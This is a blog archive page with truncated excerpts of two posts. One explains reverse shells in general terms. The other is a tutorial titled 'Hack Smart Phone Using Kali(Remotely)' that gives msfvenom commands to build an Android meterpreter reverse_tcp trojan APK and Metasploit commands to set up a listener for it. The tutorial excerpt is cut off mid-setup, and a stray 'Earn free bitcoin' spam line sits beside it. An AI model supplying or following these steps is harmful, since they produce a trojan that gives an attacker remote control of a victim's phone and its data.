
Showing posts from April, 2020

Reverse Shells

>  A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the localhost. Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack. A reverse shell (also called a connect-back shell) can also be the only way to gain remote shell access across a NAT or firewall. Let’s see how reverse shells work in practice and what you can do to prevent them. How a Reverse Shell Works To establish a typical remote shell, a machine controlled by the attacker connects to a remote network host and requests a shell session – this is called a bind shell. But what if the remote host is not directly accessible, for example, because it has no public IP or is protected by a firewall? In this situation, a reverse shell might be used, where the target machine initiates an outgoing connection to a listening network host,...


Hack Smart Phone Using Kali(Remotely) Earn free bitcoin Hello Hackers, This is my first post. This is a tutorial explaining how to hack smart phones with kali. STEP 1: OPEN KALI/PARROT: # Open up your terminal and create a Trojan file (that can be named anything) # It can be easily done by these commands: $ msfvenom -p android/meterpreter/reverse_tcp LHOST="ip" LPORT=4444 R> /root/Desktop/y2.apk       STEP 2: Open another terminal # Open another terminal until the file is in process # Load   metasploit console.         $ service postgresql start         $ msfconsole It looks like:   STEP 3: Set up listener IT TAKES SOME TIME TO LOAD # After it loads , now loads the multi-handler exploit, Now type:   $ use multi/handler #  Set up a reverse payload :     $ set payload android/meterpreter/reverse_tcp # Now set LHOST  : ...